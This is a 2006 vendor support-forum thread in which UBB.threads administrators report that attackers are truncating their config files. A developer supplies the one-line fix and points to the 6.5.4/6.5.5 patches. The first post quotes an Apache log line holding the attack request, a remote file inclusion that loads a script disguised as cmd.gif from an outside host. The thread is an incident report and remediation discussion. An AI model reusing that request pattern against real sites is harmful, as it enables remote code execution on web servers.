Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online Now
1 registered members (Baldeagle), 88 guests, and 291 spiders.
Key: Admin, Global Mod, Mod
Member Spotlight
Mark S
Mark S
Liverpool : England : UK
Posts: 4,722
Joined: July 2006
Show All Member Profiles 
Top Posters(30 Days)
Gizmo 23
Ruben 15
isaac 10
Morgan 8
Alento 4
SteveS 3
JAISP 2
Latest Photos
Test
Testing to drag photos
Comfortable Cats
Test
BSA photos
Previous Thread
Next Thread
Print Thread
security flaw in doedittheme.php and doeditconfig.php #130034
09/30/06 04:28 AM
09/30/06 04:28 AM
R
RSchiffman  Offline OP
stranger
Joined: May 2006
Posts: 9
There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is:
158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd
.gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"

and

It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.

Re: security flaw in doedittheme.php and doeditconfig.php #130035
09/30/06 04:45 AM
09/30/06 04:45 AM
R
RSchiffman  Offline OP
stranger
Joined: May 2006
Posts: 9
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.

Re: security flaw in doedittheme.php and doeditconfig.php #130036
09/30/06 09:29 AM
09/30/06 09:29 AM
R
Rick  Offline
Former Developer
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.

if (!defined('IS_ADMIN')) exit;

You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.

Re: security flaw in doedittheme.php and doeditconfig.php #130037
09/30/06 12:19 PM
09/30/06 12:19 PM
JoshPet  Offline
enthusiast
Joined: Jun 2006
Posts: 292
Charlotte, NC
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix. <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Re: security flaw in doedittheme.php and doeditconfig.php #130038
10/01/06 06:46 PM
10/01/06 06:46 PM
B
Bonny  Offline
stranger
Joined: Oct 2006
Posts: 2
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.

Re: security flaw in doedittheme.php and doeditconfig.php #130039
10/01/06 09:04 PM
10/01/06 09:04 PM
R
Rick  Offline
Former Developer
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.


Shout Box
Today's Birthdays
No Birthdays
Recent Topics
Repliers can change thread title
by Baldeagle. 11/12/18 08:49 PM
Tabs In Header
by AstroCat. 11/11/18 08:33 AM
Mindraven
by SteveS. 11/09/18 07:12 PM
Censor List
by Larry Miller. 11/08/18 02:53 PM
The table 'ubbt_topic_views' is full
by Metamatic. 11/01/18 07:12 PM
Forum Statistics
Forums36
Topics35,164
Posts191,593
Members12,111
Most Online978
Jun 24th, 2007
Random Image
Powered by UBB.threads™ PHP Forum Software 7.6.2